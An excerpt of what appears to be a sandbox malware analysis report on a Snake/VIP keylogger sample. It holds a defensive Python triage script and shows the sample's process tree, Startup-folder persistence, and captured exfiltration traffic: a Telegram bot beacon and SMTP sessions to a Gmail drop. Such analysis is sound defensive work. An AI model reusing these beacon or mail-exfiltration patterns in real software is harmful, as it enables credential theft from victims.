2025-01-10 18:11:12 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:56:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2025-01-10 18:11:12 UTC | 344 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 18:11:12 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 18:11:12 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}
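Sessions 14 to 18 are the same geo-IP lookup repeated from RegSvcs.exe (PID 2136), and session 19 is the Telegram beacon. Two details in that request matter for triage: the request-target is /bot/sendMessage with nothing between /bot and /sendMessage, so no bot token was sent, and chat_id= is empty, which is why api.telegram.org answers 404 with {"ok":false,...}; the percent-encoded text parameter is the actual beacon body (computer name, local time, country name and a canned note). The script below is an added example, not Joe Sandbox output and not code from the sample: it classifies request lines copied from these sessions, decodes the beacon text, checks whether the Telegram token has the shape of a real one, and pulls the country code out of the (truncated) geo-IP reply. The token-shape regex and the second geo-IP hostname are assumptions, marked as such in the comments.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request lines copied from the sessions above: (Host header, request-target).
# The Telegram text parameter is exactly what the sample sent.
SAMPLE_REQUESTS = [
    ("reallyfreegeoip.org", "/xml/8.46.123.189"),
    ("reallyfreegeoip.org", "/xml/8.46.123.189"),
    ("reallyfreegeoip.org", "/xml/8.46.123.189"),
    ("api.telegram.org",
     "/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0A"
     "Date%20and%20Time:%2011/01/2025%20/%2000:56:05%0D%0A"
     "Country%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the"
     "%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system"
     "%20storage's%20empty.%20%5D"),
]

# Start of the geo-IP reply body as shown in the capture (the capture truncates it).
SAMPLE_GEOIP_BODY = ("<Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode>"
                     "<CountryName>United States</CountryName><RegionCode>NY</RegionCode>")

# reallyfreegeoip.org is the service seen in this report; checkip.dyndns.org is an
# assumption added here as another IP-lookup endpoint worth flagging.
GEOIP_HOSTS = {"reallyfreegeoip.org", "checkip.dyndns.org"}

# Bot API paths look like /bot<token>/<method>; an empty token still matches.
TELEGRAM_PATH = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)$")
# Assumed shape of a real token: numeric bot id, colon, secret of 30+ chars.
TOKEN_SHAPE = re.compile(r"^\d+:[A-Za-z0-9_-]{30,}$")


def classify(host, target):
    """Label one request as a geo-IP lookup, a Telegram Bot API call, or other."""
    if host in GEOIP_HOSTS:
        return "geoip-lookup"
    if host == "api.telegram.org" and TELEGRAM_PATH.match(urlsplit(target).path):
        return "telegram-bot-api"
    return "other"


def parse_telegram(target):
    """Return method, token, chat_id and the decoded message, or None if not a Bot API path."""
    parts = urlsplit(target)
    m = TELEGRAM_PATH.match(parts.path)
    if not m:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)   # keep chat_id= even though empty
    token = m.group("token")
    return {
        "method": m.group("method"),
        "token": token,
        "token_looks_valid": bool(TOKEN_SHAPE.match(token)),
        "chat_id": qs.get("chat_id", [""])[0],
        "text": qs.get("text", [""])[0],                  # percent-decoded beacon body
    }


def geoip_country(body):
    """Country code from the XML reply even when the capture cut the body short."""
    m = re.search(r"<CountryCode>([A-Z]{2})</CountryCode>", body)
    return m.group(1) if m else None


def triage(requests):
    """Count location checks and report whether the Telegram channel is usable at all."""
    summary = {"geoip_lookups": 0, "telegram": None}
    for host, target in requests:
        kind = classify(host, target)
        if kind == "geoip-lookup":
            summary["geoip_lookups"] += 1
        elif kind == "telegram-bot-api":
            summary["telegram"] = parse_telegram(target)
    return summary


if __name__ == "__main__":
    s = triage(SAMPLE_REQUESTS)
    print("geo-IP lookups:", s["geoip_lookups"])
    tg = s["telegram"]
    if tg:
        print(f"Telegram {tg['method']}: token_valid={tg['token_looks_valid']} chat_id={tg['chat_id']!r}")
        print("beacon text:", tg["text"].strip())
```

Run against a proxy or sandbox export, a token that fails TOKEN_SHAPE together with an empty chat_id is the signature of a build whose Telegram configuration was never filled in (or was stripped), and the repeated geo-IP hits are the country check the report flags under "Tries to detect the country of the analysis system".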


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 10, 2025 19:11:07.367440939 CET | 587 | 49871 | 3.130.71.34 | 192.168.2.6 | 220 acadental.com ESMTP Postfix (Ubuntu)
Jan 10, 2025 19:11:07.367710114 CET | 49871 | 587 | 192.168.2.6 | 3.130.71.34 | EHLO 210979
Jan 10, 2025 19:11:07.484662056 CET | 587 | 49871 | 3.130.71.34 | 192.168.2.6 | 250-acadental.com
    250-PIPELINING
    250-SIZE 30971520
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 SMTPUTF8
Jan 10, 2025 19:11:07.488297939 CET | 49871 | 587 | 192.168.2.6 | 3.130.71.34 | AUTH login c2hpcHBpbmdAYWNhZGVudGFsLmNvbQ==
Jan 10, 2025 19:11:07.605179071 CET | 587 | 49871 | 3.130.71.34 | 192.168.2.6 | 334 UGFzc3dvcmQ6
Jan 10, 2025 19:11:11.120903969 CET | 587 | 49871 | 3.130.71.34 | 192.168.2.6 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 10, 2025 19:11:11.121153116 CET | 49871 | 587 | 192.168.2.6 | 3.130.71.34 | MAIL FROM:<shipping@acadental.com>
Jan 10, 2025 19:11:11.239209890 CET | 587 | 49871 | 3.130.71.34 | 192.168.2.6 | 250 2.1.0 Ok
Jan 10, 2025 19:11:11.239459991 CET | 49871 | 587 | 192.168.2.6 | 3.130.71.34 | RCPT TO:<enquiry.zamehinc@gmail.com>
Jan 10, 2025 19:11:11.357387066 CET | 587 | 49871 | 3.130.71.34 | 192.168.2.6 | 501 5.5.2 <210979>: Helo command rejected: Invalid name
Jan 10, 2025 19:11:18.559165001 CET | 587 | 49947 | 3.130.71.34 | 192.168.2.6 | 220 acadental.com ESMTP Postfix (Ubuntu)
Jan 10, 2025 19:11:18.559390068 CET | 49947 | 587 | 192.168.2.6 | 3.130.71.34 | EHLO 210979
Jan 10, 2025 19:11:18.680435896 CET | 587 | 49947 | 3.130.71.34 | 192.168.2.6 | 250-acadental.com
    250-PIPELINING
    250-SIZE 30971520
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 SMTPUTF8
Jan 10, 2025 19:11:18.680958033 CET | 49947 | 587 | 192.168.2.6 | 3.130.71.34 | AUTH login c2hpcHBpbmdAYWNhZGVudGFsLmNvbQ==
Jan 10, 2025 19:11:22.805089951 CET | 587 | 49947 | 3.130.71.34 | 192.168.2.6 | 334 UGFzc3dvcmQ6
Jan 10, 2025 19:11:26.548578978 CET | 587 | 49947 | 3.130.71.34 | 192.168.2.6 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 10, 2025 19:11:26.548854113 CET | 49947 | 587 | 192.168.2.6 | 3.130.71.34 | MAIL FROM:<shipping@acadental.com>
Jan 10, 2025 19:11:26.669436932 CET | 587 | 49947 | 3.130.71.34 | 192.168.2.6 | 250 2.1.0 Ok
Jan 10, 2025 19:11:26.669635057 CET | 49947 | 587 | 192.168.2.6 | 3.130.71.34 | RCPT TO:<enquiry.zamehinc@gmail.com>
Jan 10, 2025 19:11:26.792495012 CET | 587 | 49947 | 3.130.71.34 | 192.168.2.6 | 501 5.5.2 <210979>: Helo command rejected: Invalid name


Target ID: 0
Start time: 13:10:37
Start date: 10/01/2025
Path: C:\Users\user\Desktop\RubzLi27lr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\RubzLi27lr.exe"
Imagebase: 0xab0000
File size: 1'094'656 bytes
MD5 hash: 44F0EA32A5ACF017ACF1D2A595C615F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 13:10:39
Start date: 10/01/2025
Path: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\RubzLi27lr.exe"
Imagebase: 0x8e0000
File size: 1'094'656 bytes
MD5 hash: 44F0EA32A5ACF017ACF1D2A595C615F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 68%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 3
Start time: 13:10:42
Start date: 10/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\RubzLi27lr.exe"
Imagebase: 0x7b0000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3368516346.0000000000423000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 7
Start time: 13:10:55
Start date: 10/01/2025
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"
Imagebase: 0x7ff794460000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 13:10:55
Start date: 10/01/2025
Path: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe"
Imagebase: 0x8e0000
File size: 1'094'656 bytes
MD5 hash: 44F0EA32A5ACF017ACF1D2A595C615F1
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 9
Start time: 13:10:58
Start date: 10/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe"
Imagebase: 0xc10000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Execution Graph

Execution Coverage: 2.7%
Dynamic/Decrypted Code Coverage: 0.9%
Signature Coverage: 2.8%
Total number of Nodes: 1962
Total number of Limit Nodes: 66
96305->96308 96310 ae29c8 96306->96310 96308->96304 96308->96305 96318 ad4ead 7 API calls 2 library calls 96308->96318 96311 ae29d3 RtlFreeHeap 96310->96311 96312 ae29fc __dosmaperr 96310->96312 96311->96312 96313 ae29e8 96311->96313 96312->96292 96320 adf2d9 20 API calls __dosmaperr 96313->96320 96315 ae29ee GetLastError 96315->96312 96316->96295 96317->96286 96318->96308 96319->96306 96320->96315 96321->96300 96323 acfddb 22 API calls 96322->96323 96324 ab5734 96323->96324 96324->96233 96326 ab42bc FindResourceExW 96325->96326 96330 ab42d9 96325->96330 96327 af35ba LoadResource 96326->96327 96326->96330 96328 af35cf SizeofResource 96327->96328 96327->96330 96329 af35e3 LockResource 96328->96329 96328->96330 96329->96330 96330->96245 96332 ab512e 96331->96332 96333 af3d90 96331->96333 96337 adece3 96332->96337 96336->96238 96340 adeaaa 96337->96340 96339 ab513c 96339->96245 96343 adeab6 ___scrt_is_nonwritable_in_current_image 96340->96343 96341 adeac2 96353 adf2d9 20 API calls __dosmaperr 96341->96353 96343->96341 96344 adeae8 96343->96344 96355 ad918d EnterCriticalSection 96344->96355 96346 adeac7 96354 ae27ec 26 API calls pre_c_initialization 96346->96354 96347 adeaf4 96356 adec0a 62 API calls 2 library calls 96347->96356 96350 adeb08 96357 adeb27 LeaveCriticalSection __fread_nolock 96350->96357 96352 adead2 __wsopen_s 96352->96339 96353->96346 96354->96352 96355->96347 96356->96350 96357->96352 96361 ade8e1 96358->96361 96360 ab5118 96360->96251 96362 ade8ed ___scrt_is_nonwritable_in_current_image 96361->96362 96363 ade925 __wsopen_s 96362->96363 96364 ade92d 96362->96364 96365 ade900 ___scrt_fastfail 96362->96365 96363->96360 96374 ad918d EnterCriticalSection 96364->96374 96388 adf2d9 20 API calls __dosmaperr 96365->96388 96368 ade937 96375 ade6f8 96368->96375 96369 ade91a 96389 ae27ec 26 API calls pre_c_initialization 96369->96389 96374->96368 96376 ade727 96375->96376 96379 ade70a ___scrt_fastfail 96375->96379 96390 ade96c LeaveCriticalSection __fread_nolock 
96376->96390 96377 ade717 96463 adf2d9 20 API calls __dosmaperr 96377->96463 96379->96376 96379->96377 96381 ade76a __fread_nolock 96379->96381 96381->96376 96382 ade886 ___scrt_fastfail 96381->96382 96391 add955 96381->96391 96398 ae8d45 96381->96398 96465 adcf78 26 API calls 4 library calls 96381->96465 96466 adf2d9 20 API calls __dosmaperr 96382->96466 96386 ade71c 96464 ae27ec 26 API calls pre_c_initialization 96386->96464 96388->96369 96389->96363 96390->96363 96392 add976 96391->96392 96393 add961 96391->96393 96392->96381 96467 adf2d9 20 API calls __dosmaperr 96393->96467 96395 add966 96468 ae27ec 26 API calls pre_c_initialization 96395->96468 96397 add971 96397->96381 96399 ae8d6f 96398->96399 96400 ae8d57 96398->96400 96402 ae90d9 96399->96402 96405 ae8db4 96399->96405 96478 adf2c6 20 API calls __dosmaperr 96400->96478 96494 adf2c6 20 API calls __dosmaperr 96402->96494 96403 ae8d5c 96479 adf2d9 20 API calls __dosmaperr 96403->96479 96408 ae8dbf 96405->96408 96409 ae8d64 96405->96409 96416 ae8def 96405->96416 96407 ae90de 96495 adf2d9 20 API calls __dosmaperr 96407->96495 96480 adf2c6 20 API calls __dosmaperr 96408->96480 96409->96381 96412 ae8dcc 96496 ae27ec 26 API calls pre_c_initialization 96412->96496 96413 ae8dc4 96481 adf2d9 20 API calls __dosmaperr 96413->96481 96417 ae8e08 96416->96417 96418 ae8e2e 96416->96418 96419 ae8e4a 96416->96419 96417->96418 96452 ae8e15 96417->96452 96482 adf2c6 20 API calls __dosmaperr 96418->96482 96485 ae3820 21 API calls __dosmaperr 96419->96485 96421 ae8e33 96483 adf2d9 20 API calls __dosmaperr 96421->96483 96425 ae8e61 96428 ae29c8 _free 20 API calls 96425->96428 96426 ae8e3a 96484 ae27ec 26 API calls pre_c_initialization 96426->96484 96427 ae8fb3 96430 ae9029 96427->96430 96433 ae8fcc GetConsoleMode 96427->96433 96431 ae8e6a 96428->96431 96432 ae902d ReadFile 96430->96432 96434 ae29c8 _free 20 API calls 96431->96434 96435 ae9047 96432->96435 96436 ae90a1 GetLastError 96432->96436 96433->96430 96437 ae8fdd 
96433->96437 96438 ae8e71 96434->96438 96435->96436 96441 ae901e 96435->96441 96439 ae90ae 96436->96439 96440 ae9005 96436->96440 96437->96432 96442 ae8fe3 ReadConsoleW 96437->96442 96443 ae8e7b 96438->96443 96444 ae8e96 96438->96444 96492 adf2d9 20 API calls __dosmaperr 96439->96492 96461 ae8e45 __fread_nolock 96440->96461 96489 adf2a3 20 API calls __dosmaperr 96440->96489 96456 ae906c 96441->96456 96457 ae9083 96441->96457 96441->96461 96442->96441 96448 ae8fff GetLastError 96442->96448 96486 adf2d9 20 API calls __dosmaperr 96443->96486 96488 ae9424 28 API calls __wsopen_s 96444->96488 96448->96440 96449 ae29c8 _free 20 API calls 96449->96409 96450 ae8e80 96487 adf2c6 20 API calls __dosmaperr 96450->96487 96451 ae90b3 96493 adf2c6 20 API calls __dosmaperr 96451->96493 96469 aef89b 96452->96469 96490 ae8a61 31 API calls 3 library calls 96456->96490 96459 ae909a 96457->96459 96457->96461 96491 ae88a1 29 API calls __wsopen_s 96459->96491 96461->96449 96462 ae909f 96462->96461 96463->96386 96464->96376 96465->96381 96466->96386 96467->96395 96468->96397 96470 aef8a8 96469->96470 96471 aef8b5 96469->96471 96497 adf2d9 20 API calls __dosmaperr 96470->96497 96473 aef8c1 96471->96473 96498 adf2d9 20 API calls __dosmaperr 96471->96498 96473->96427 96475 aef8ad 96475->96427 96476 aef8e2 96499 ae27ec 26 API calls pre_c_initialization 96476->96499 96478->96403 96479->96409 96480->96413 96481->96412 96482->96421 96483->96426 96484->96461 96485->96425 96486->96450 96487->96461 96488->96452 96489->96461 96490->96461 96491->96462 96492->96451 96493->96461 96494->96407 96495->96412 96496->96409 96497->96475 96498->96476 96499->96475 96503 ade4e8 96500->96503 96502 b2275d 96502->96253 96506 ade469 96503->96506 96505 ade505 96505->96502 96507 ade48c 96506->96507 96508 ade478 96506->96508 96513 ade488 __alldvrm 96507->96513 96516 ae333f 11 API calls 2 library calls 96507->96516 96514 adf2d9 20 API calls __dosmaperr 96508->96514 96510 ade47d 96515 ae27ec 26 API calls 
pre_c_initialization 96510->96515 96513->96505 96514->96510 96515->96513 96516->96513 96522 b22e7a 96517->96522 96518 ab50f5 40 API calls 96518->96522 96519 b22d3b 96519->96182 96519->96199 96520 b228fe 27 API calls 96520->96522 96521 ab511f 64 API calls 96521->96522 96522->96518 96522->96519 96522->96520 96522->96521 96524 b222e7 96523->96524 96525 b222d9 96523->96525 96527 b2232c 96524->96527 96528 ade5eb 29 API calls 96524->96528 96538 b222f0 96524->96538 96526 ade5eb 29 API calls 96525->96526 96526->96524 96552 b22557 96527->96552 96529 b22311 96528->96529 96529->96527 96531 b2231a 96529->96531 96535 ade678 67 API calls 96531->96535 96531->96538 96532 b22370 96533 b22374 96532->96533 96534 b22395 96532->96534 96537 b22381 96533->96537 96540 ade678 67 API calls 96533->96540 96556 b22171 96534->96556 96535->96538 96537->96538 96541 ade678 67 API calls 96537->96541 96538->96199 96539 b2239d 96542 b223c3 96539->96542 96543 b223a3 96539->96543 96540->96537 96541->96538 96563 b223f3 96542->96563 96545 b223b0 96543->96545 96546 ade678 67 API calls 96543->96546 96545->96538 96547 ade678 67 API calls 96545->96547 96546->96545 96547->96538 96548 b223ca 96550 b223de 96548->96550 96571 ade678 96548->96571 96550->96538 96551 ade678 67 API calls 96550->96551 96551->96538 96553 b2257c 96552->96553 96555 b22565 __fread_nolock 96552->96555 96554 ade8c4 __fread_nolock 40 API calls 96553->96554 96554->96555 96555->96532 96557 adea0c ___std_exception_copy 21 API calls 96556->96557 96558 b2217f 96557->96558 96559 adea0c ___std_exception_copy 21 API calls 96558->96559 96560 b22190 96559->96560 96561 adea0c ___std_exception_copy 21 API calls 96560->96561 96562 b2219c 96561->96562 96562->96539 96565 b22408 96563->96565 96564 b224c0 96588 b22724 96564->96588 96565->96564 96567 b221cc 40 API calls 96565->96567 96570 b224c7 96565->96570 96584 b22606 96565->96584 96592 b22269 40 API calls 96565->96592 96567->96565 96570->96548 96572 ade684 ___scrt_is_nonwritable_in_current_image 
96571->96572 96573 ade6aa 96572->96573 96574 ade695 96572->96574 96583 ade6a5 __wsopen_s 96573->96583 96628 ad918d EnterCriticalSection 96573->96628 96645 adf2d9 20 API calls __dosmaperr 96574->96645 96577 ade69a 96646 ae27ec 26 API calls pre_c_initialization 96577->96646 96578 ade6c6 96629 ade602 96578->96629 96581 ade6d1 96647 ade6ee LeaveCriticalSection __fread_nolock 96581->96647 96583->96550 96585 b22617 96584->96585 96586 b2261d 96584->96586 96585->96586 96593 b226d7 96585->96593 96586->96565 96589 b22731 96588->96589 96591 b22742 96588->96591 96590 addbb3 65 API calls 96589->96590 96590->96591 96591->96570 96592->96565 96594 b22703 96593->96594 96595 b22714 96593->96595 96597 addbb3 96594->96597 96595->96585 96598 addbdd 96597->96598 96599 addbc1 96597->96599 96598->96595 96599->96598 96600 addbcd 96599->96600 96601 addbe3 96599->96601 96609 adf2d9 20 API calls __dosmaperr 96600->96609 96606 add9cc 96601->96606 96604 addbd2 96610 ae27ec 26 API calls pre_c_initialization 96604->96610 96611 add97b 96606->96611 96608 add9f0 96608->96598 96609->96604 96610->96598 96612 add987 ___scrt_is_nonwritable_in_current_image 96611->96612 96619 ad918d EnterCriticalSection 96612->96619 96614 add995 96620 add9f4 96614->96620 96618 add9b3 __wsopen_s 96618->96608 96619->96614 96621 ae49a1 27 API calls 96620->96621 96622 adda09 96621->96622 96623 adda3a 62 API calls 96622->96623 96624 adda24 96623->96624 96625 ae4a56 62 API calls 96624->96625 96626 add9a2 96625->96626 96627 add9c0 LeaveCriticalSection __fread_nolock 96626->96627 96627->96618 96628->96578 96630 ade60f 96629->96630 96631 ade624 96629->96631 96673 adf2d9 20 API calls __dosmaperr 96630->96673 96637 ade61f 96631->96637 96648 addc0b 96631->96648 96633 ade614 96674 ae27ec 26 API calls pre_c_initialization 96633->96674 96637->96581 96640 add955 __fread_nolock 26 API calls 96641 ade646 96640->96641 96658 ae862f 96641->96658 96644 ae29c8 _free 20 API calls 96644->96637 96645->96577 96646->96583 96647->96583 96649 addc23 
96648->96649 96651 addc1f 96648->96651 96650 add955 __fread_nolock 26 API calls 96649->96650 96649->96651 96652 addc43 96650->96652 96654 ae4d7a 96651->96654 96675 ae59be 96652->96675 96655 ade640 96654->96655 96656 ae4d90 96654->96656 96655->96640 96656->96655 96657 ae29c8 _free 20 API calls 96656->96657 96657->96655 96659 ae863e 96658->96659 96660 ae8653 96658->96660 96798 adf2c6 20 API calls __dosmaperr 96659->96798 96661 ae868e 96660->96661 96665 ae867a 96660->96665 96800 adf2c6 20 API calls __dosmaperr 96661->96800 96664 ae8643 96799 adf2d9 20 API calls __dosmaperr 96664->96799 96795 ae8607 96665->96795 96666 ae8693 96801 adf2d9 20 API calls __dosmaperr 96666->96801 96670 ade64c 96670->96637 96670->96644 96671 ae869b 96802 ae27ec 26 API calls pre_c_initialization 96671->96802 96673->96633 96674->96637 96676 ae59ca ___scrt_is_nonwritable_in_current_image 96675->96676 96677 ae59ea 96676->96677 96678 ae59d2 96676->96678 96680 ae5a88 96677->96680 96685 ae5a1f 96677->96685 96754 adf2c6 20 API calls __dosmaperr 96678->96754 96759 adf2c6 20 API calls __dosmaperr 96680->96759 96681 ae59d7 96755 adf2d9 20 API calls __dosmaperr 96681->96755 96684 ae5a8d 96760 adf2d9 20 API calls __dosmaperr 96684->96760 96700 ae5147 EnterCriticalSection 96685->96700 96686 ae59df __wsopen_s 96686->96651 96689 ae5a95 96761 ae27ec 26 API calls pre_c_initialization 96689->96761 96690 ae5a25 96692 ae5a56 96690->96692 96693 ae5a41 96690->96693 96701 ae5aa9 96692->96701 96756 adf2d9 20 API calls __dosmaperr 96693->96756 96696 ae5a51 96758 ae5a80 LeaveCriticalSection __wsopen_s 96696->96758 96697 ae5a46 96757 adf2c6 20 API calls __dosmaperr 96697->96757 96700->96690 96702 ae5ad7 96701->96702 96740 ae5ad0 96701->96740 96703 ae5afa 96702->96703 96704 ae5adb 96702->96704 96708 ae5b4b 96703->96708 96709 ae5b2e 96703->96709 96769 adf2c6 20 API calls __dosmaperr 96704->96769 96707 ae5ae0 96770 adf2d9 20 API calls __dosmaperr 96707->96770 96712 ae5b61 96708->96712 96775 ae9424 28 API calls __wsopen_s 
96708->96775 96772 adf2c6 20 API calls __dosmaperr 96709->96772 96710 ae5cb1 96710->96696 96762 ae564e 96712->96762 96714 ae5ae7 96771 ae27ec 26 API calls pre_c_initialization 96714->96771 96717 ae5b33 96773 adf2d9 20 API calls __dosmaperr 96717->96773 96721 ae5b3b 96774 ae27ec 26 API calls pre_c_initialization 96721->96774 96722 ae5b6f 96727 ae5b95 96722->96727 96728 ae5b73 96722->96728 96723 ae5ba8 96725 ae5bbc 96723->96725 96726 ae5c02 WriteFile 96723->96726 96731 ae5bc4 96725->96731 96732 ae5bf2 96725->96732 96729 ae5c25 GetLastError 96726->96729 96734 ae5b8b 96726->96734 96777 ae542e 45 API calls 3 library calls 96727->96777 96733 ae5c69 96728->96733 96776 ae55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96728->96776 96729->96734 96735 ae5bc9 96731->96735 96736 ae5be2 96731->96736 96780 ae56c4 7 API calls 2 library calls 96732->96780 96733->96740 96784 adf2d9 20 API calls __dosmaperr 96733->96784 96734->96733 96734->96740 96745 ae5c45 96734->96745 96735->96733 96742 ae5bd2 96735->96742 96779 ae5891 8 API calls 2 library calls 96736->96779 96739 ae5be0 96739->96734 96786 ad0a8c 96740->96786 96778 ae57a3 7 API calls 2 library calls 96742->96778 96744 ae5c8e 96785 adf2c6 20 API calls __dosmaperr 96744->96785 96748 ae5c4c 96745->96748 96749 ae5c60 96745->96749 96781 adf2d9 20 API calls __dosmaperr 96748->96781 96783 adf2a3 20 API calls __dosmaperr 96749->96783 96752 ae5c51 96782 adf2c6 20 API calls __dosmaperr 96752->96782 96754->96681 96755->96686 96756->96697 96757->96696 96758->96686 96759->96684 96760->96689 96761->96686 96763 aef89b __fread_nolock 26 API calls 96762->96763 96764 ae565e 96763->96764 96765 ae5663 96764->96765 96793 ae2d74 38 API calls 3 library calls 96764->96793 96765->96722 96765->96723 96767 ae56a4 GetConsoleMode 96767->96765 96768 ae5686 96768->96765 